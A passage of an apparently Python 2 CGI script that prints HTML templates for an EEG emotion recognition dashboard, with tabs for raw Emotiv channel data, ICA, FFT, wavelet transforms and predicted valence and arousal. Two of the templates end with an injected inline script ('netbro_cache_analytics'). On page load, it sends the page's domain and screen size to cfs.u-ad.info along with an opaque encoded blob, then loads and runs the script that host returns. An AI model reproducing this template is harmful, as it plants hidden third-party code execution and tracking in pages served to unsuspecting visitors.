<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="independent-component-analysis">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="fast-fourier-transformation">
<br/>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/delta.png" width="100%" height="200px">
<h4 class="text-center">Delta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/theta.png" width="100%" height="200px">
<h4 class="text-center">Theta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/alpha.png" width="100%" height="200px">
<h4 class="text-center">Alpha</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/beta.png" width="100%" height="200px">
<h4 class="text-center">Beta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/gamma.png" width="100%" height="200px">
<h4 class="text-center">Gamma</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
</div>
<div class="tab-pane fade" id="prediction-result">
<br/>
<div class="row">
<div class="col-lg-2"></div>
<div class="col-lg-2">'''+strValence+'''</div>
<div class="col-lg-4"></div>
<div class="col-lg-2">'''+strArousal+'''</div>
<div class="col-lg-2"></div>
</div>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">'''+strClass+'''</div>
<div class="col-lg-4"></div>
</div>
</div>
</div>
</div>
<!-- /.panel-body -->
</div>
<!-- /.panel -->
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
</div>
<!-- /#page-wrapper -->
</div>
<!-- /#wrapper -->
<!-- jQuery -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Metis Menu Plugin JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
<!-- Morris Charts JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
<!-- Custom Theme JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
if preprocessing_method=='swt':
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>EEG Emotion Recognition</title>
<!-- Bootstrap Core CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- MetisMenu CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
<!-- Timeline CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="../css/dashboard.css" rel="stylesheet">
<!-- Morris Charts CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div id="wrapper">
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-info">
<div class="panel-body">
<!-- Nav tabs -->
<ul class="nav nav-tabs">
<li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
</li>
<li><a href="#raw-data" data-toggle="tab">Raw Data</a>
</li>
<li><a href="#stationery-wavelet-transform" data-toggle="tab">Stationery Wavelet Transform</a>
</li>
<li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
</li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<div class="tab-pane fade in active" id="emotiv-channels">
<br/>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">
<img src="../img/emotiv_channel.png" width="100%">
<h4 class="text-center">Emotiv Channels</h4>
</div>
<div class="col-lg-4"></div>
</div>
</div>
<div class="tab-pane fade" id="raw-data">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="stationery-wavelet-transform">
<br/>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/a5.png" width="100%" height="200px">
<h4 class="text-center">Approximation 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d5.png" width="100%" height="200px">
<h4 class="text-center">Detail 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d4.png" width="100%" height="200px">
<h4 class="text-center">Detail 4</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d3.png" width="100%" height="200px">
<h4 class="text-center">Detail 3</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d2.png" width="100%" height="200px">
<h4 class="text-center">Detail 2</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
</div>
<div class="tab-pane fade" id="prediction-result">
<br/>
<div class="row">
<div class="col-lg-2"></div>
<div class="col-lg-2">'''+strValence+'''</div>
<div class="col-lg-4"></div>
<div class="col-lg-2">'''+strArousal+'''</div>
<div class="col-lg-2"></div>
</div>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">'''+strClass+'''</div>
<div class="col-lg-4"></div>
</div>
</div>
</div>
</div>
<!-- /.panel-body -->
</div>
<!-- /.panel -->
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
</div>
<!-- /#page-wrapper -->
</div>
<!-- /#wrapper -->
<!-- jQuery -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Metis Menu Plugin JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
<!-- Morris Charts JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
<!-- Custom Theme JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
if preprocessing_method=='ica_swt':
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>EEG Emotion Recognition</title>
<!-- Bootstrap Core CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- MetisMenu CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
<!-- Timeline CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="../css/dashboard.css" rel="stylesheet">
<!-- Morris Charts CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div id="wrapper">
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-info">
<div class="panel-body">
<!-- Nav tabs -->
<ul class="nav nav-tabs">
<li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
</li>
<li><a href="#raw-data" data-toggle="tab">Raw Data</a>
</li>
<li><a href="#independent-component-analysis" data-toggle="tab">Independent Component Analysis</a>
</li>
<li><a href="#stationery-wavelet-transform" data-toggle="tab">Stationery Wavelet Transform</a>
</li>
<li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
</li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<div class="tab-pane fade in active" id="emotiv-channels">
<br/>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">
<img src="../img/emotiv_channel.png" width="100%">
<h4 class="text-center">Emotiv Channels</h4>
</div>
<div class="col-lg-4"></div>
</div>
</div>
<div class="tab-pane fade" id="raw-data">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="independent-component-analysis">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="stationery-wavelet-transform">
<br/>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/a5.png" width="100%" height="200px">
<h4 class="text-center">Approximation 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d5.png" width="100%" height="200px">
<h4 class="text-center">Detail 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d4.png" width="100%" height="200px">
<h4 class="text-center">Detail 4</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d3.png" width="100%" height="200px">
<h4 class="text-center">Detail 3</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d2.png" width="100%" height="200px">
<h4 class="text-center">Detail 2</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
</div>
<div class="tab-pane fade" id="prediction-result">
<br/>
<div class="row">
<div class="col-lg-2"></div>
<div class="col-lg-2">'''+strValence+'''</div>
<div class="col-lg-4"></div>
<div class="col-lg-2">'''+strArousal+'''</div>
<div class="col-lg-2"></div>
</div>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">'''+strClass+'''</div>
<div class="col-lg-4"></div>
</div>
</div>
</div>
</div>
<!-- /.panel-body -->
</div>
<!-- /.panel -->
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
</div>
<!-- /#page-wrapper -->
</div>
<!-- /#wrapper -->
<!-- jQuery -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Metis Menu Plugin JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
<!-- Morris Charts JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
<!-- Custom Theme JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
